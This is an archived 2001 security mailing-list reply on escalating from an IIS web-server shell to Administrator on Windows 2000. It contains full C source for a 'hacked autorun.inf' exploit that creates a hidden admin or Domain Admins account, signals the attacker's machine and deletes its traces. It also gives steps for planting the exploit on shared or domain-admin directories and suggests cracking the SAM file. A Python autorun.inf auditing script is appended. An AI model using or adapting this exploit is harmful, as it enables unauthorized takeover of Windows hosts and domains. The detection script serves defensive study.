From: Nelson Brito (a.k.a. stderr) (stderrSEKURE.ORG)
Date: Wed Jan 10 2001 - 09:59:44 CST


    Paul Cardon wrote:

    > Charlie Rhodes wrote:
    >
    >>> We have a win2k where we have access to a cmd.exe with the rights of the
    >>> web-server and we would like to obtain administrator rights. Also we
    >>> don't have the rights to read the SAM files.
    >>> We tried the well-known methods under win NT 4.0 (like breaknt.exe,
    >>> read from raw device) in vain.
    >>
    >> Do you have network (ftp) access? or floppy access?
    >> http://www.bo2k.com should do the trick. You'll probably want to configure
    >> the server part off the machine, then load it on.
    >
    >
    > This is the second time this question has been asked on the list and
    > almost everybody misunderstands the problem. Let me restate it:
    >
    > Suppose a pen-tester has used the IIS Unicode vulnerability to download
    > a back door such as a netcat listener to the target Win2K server and now
    > has a remote cmd shell. At this point the remote shell is running with
    > IUSR_<MACHINE> privilege since that is the privilege level that the
    > Unicode vulnerability provides.
    >
    > Now, how does the pen-tester elevate privilege to Administrator?
    >
    > Any software that is downloaded (tftp, ftp, whatever) through the remote
    > command shell will only run with IUSR_<MACHINE> privilege. Why do
    > people think that downloading BO2K, netcat, or some such will magically
    > elevate privilege? It doesn't.
    >
    > The only things that are possible are:
    >
    > 1) There is a known privilege escalation vulnerability that can be
    > exploited with local unprivileged access. The attacker can download and
    > run that code to gain Administrator access.
    You can use another Win2k || NT machine to execute programs, like:
    1 - Copy a "hacked version" of autorun.inf + the hacked program to another
    Win2K || NT machine;
    2 - Put the root directory that hosts autorun.inf in shared mode;
    3 - On the IIS Unicode Traversal machine, mount the shared directory;
    4 - Now you'll see the "hacked autorun.inf" executing arbitrary commands.

    I think this will help you...

    Another way to do this is:
    1 - Find the PDC (if it exists) in the domain;
    2 - Find the "mountable directory" for "Domain Admins";
    3 - Put the "hacked autorun.inf" in this directory;
    4 - Sit and relax while waiting for a member of "Domain Admins" to log in.

    You could do this with a "Shell Folder" vulnerability, and others...

    >
    > 2) Brute force attack against accounts with local Administrator
    > privilege.

    You can crack the SAM file, coz the IUSR_<MACH> has permission to read
    this file.

    >
    > 3) Look for vulnerabilities in other systems that the web server can
    > talk to. Some of those may expose Domain accounts with Administrator
    > privilege on the web server or other systems that are trusted by the web
    > server.
    >
    > There are others but Win2K does limit some of the nicer possibilities
    > that existed with NT.
    >
    > -paul

    A source example of the "hacked autorun.inf" and the program looks like:
    --- autorun.cpp
    /****************************************************************************************
     * Author   : Nelson Brito
     * E-mail   : nelsonsecunet.com.br && stderrsekure.org
     * URL      : http://stderr.sekure.org && http://www.secunet.de
     * Date     : Belem, December 9, 2000.
     * Published: Rio de Janeiro, January 9, 2001.
     ****************************************************************************************/

    /****************************************************************************************
     * To exploit this vulnerability you will have to use your brain, because I am not
     * going to teach you how to use it; I am only publishing the code.
     *
     * Thanks to: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer, Thiago(c0nd0r),
     * Felipe(falcon), corbsekure(what's up?), Nilson Brito(brother),
     * Andre Silveira(phD), Charlene(mi amore) and Mom... =)
     ****************************************************************************************/
    #include <stdio.h>
    #include <stdlib.h>
    #include <process.h> /* execl() in VC++. */

    int main(void){
            FILE *fp;
            const char *windir = getenv("WINDIR");       // Where is %SystemRoot%?
            const char *batch  = "C:\\TEMP\\nelson.bat"; // Temporary batch file.

            if(!windir){ fprintf(stderr, "WINDIR is not set\n"); return 1; }

            /**********************************************************************************
             * Yes, I know, I could have used "NetUserAdd()" and "NetGroupAdd()", but I
             * thought a temporary "batch" file was better; the code gets smaller.
             **********************************************************************************/
            if(!(fp = fopen(batch, "w"))){ perror("fopen"); return 1; }

            fprintf(fp, "echo off\n");
            fprintf(fp, "%s\\system32\\net.exe user nelson secunet /fullname:\"Nelson Brito from Security Networks AG / IBQN\" /comment:\"Penetration Test Account\" /add > nul\n", windir);

            /**********************************************************************************
             * Here you must define whether it will be used on a DC or on a stand-alone box.
             **********************************************************************************/
            #ifdef _IS_A_PDC_
                    fprintf(fp, "%s\\system32\\net.exe group Administrators nelson /add > nul\n", windir);
                    fprintf(fp, "%s\\system32\\net.exe group \"Domain Admins\" nelson /add > nul\n", windir);
            #else
                    fprintf(fp, "%s\\system32\\net.exe localgroup Administrators nelson /add > nul\n", windir);
            #endif

            /**********************************************************************************
             * At the end, a message is sent to the machine PITBULL, my machine. =)
             **********************************************************************************/
            fprintf(fp, "%s\\system32\\net.exe send PITBULL \"Autorun Privilege Escalation Exploit Executed\"\n", windir);
            fprintf(fp, "%s\\system32\\cmd.exe /c del %s\n", windir, batch);
            fclose(fp);

            execl(batch, batch, NULL); // Run the temporary batch file; execl() only returns on failure.
            perror("execl");           // Execution error.

            return(1);
    }

    --- autorun.cpp

    --- autorun.inf
    [autorun]
    open=autorun.exe
    --- autorun.inf

    PS: It works with PGPDisk at mount time. When you mount the PGPDisk, the
    SYSTEM recognizes it as a mount point and then executes the "hacked
    autorun.inf".

    Regards,

    --
    Nelson Brito
    Security Analyst && Penetration Tester
    Security Networks AG / IBQN - http://www.secunet.de/
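A defender-side check, added here as an example and not part of the original post or the author's code: it parses autorun.inf files in the INI format shown in the thread and flags launch directives (`open=`, `shellexecute=`, `shell\...\command=`), rating those served from a UNC share or pointing at one as high, since a shared directory is exactly the delivery path described above. The sample inf text and the share path are constructed; the function names are this example's own.

```python
import configparser

# autorun.inf directives that make Windows launch a program when the volume is mounted/opened.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun_inf(text: str) -> dict:
    """Parse autorun.inf (INI syntax, keys lower-cased) into {section: {key: value}}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    return {section.lower(): dict(cp.items(section)) for section in cp.sections()}


def audit_autorun_inf(text: str, source: str) -> list:
    """Return one finding per directive in [autorun] that would run code from `source`.

    `source` is the directory the autorun.inf was read from (constructed in the sample below).
    """
    findings = []
    autorun = parse_autorun_inf(text).get("autorun", {})
    for key, value in autorun.items():
        is_launch = key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
        if not is_launch:
            continue  # icon=, label= and similar do not execute anything
        target = value.strip().strip('"')
        # Program hosted on, or inf served from, a network share: the scenario in the thread.
        over_network = target.startswith("\\\\") or source.startswith("\\\\")
        findings.append({
            "source": source,
            "directive": f"{key}={value}",
            "target": target,
            "severity": "high" if over_network else "medium",
        })
    return findings


# Constructed sample: the two-line inf from the post, plus harmless cosmetic keys.
SAMPLE_MALICIOUS = "[autorun]\nopen=autorun.exe\nicon=autorun.exe,0\nlabel=Tools\n"
# Constructed sample: cosmetic keys only, nothing is launched.
SAMPLE_BENIGN = "[AutoRun]\nicon=setup.ico\nlabel=Backup Disk\n"

if __name__ == "__main__":
    for finding in audit_autorun_inf(SAMPLE_MALICIOUS, r"\\PITBULL\tools"):
        print(finding)
```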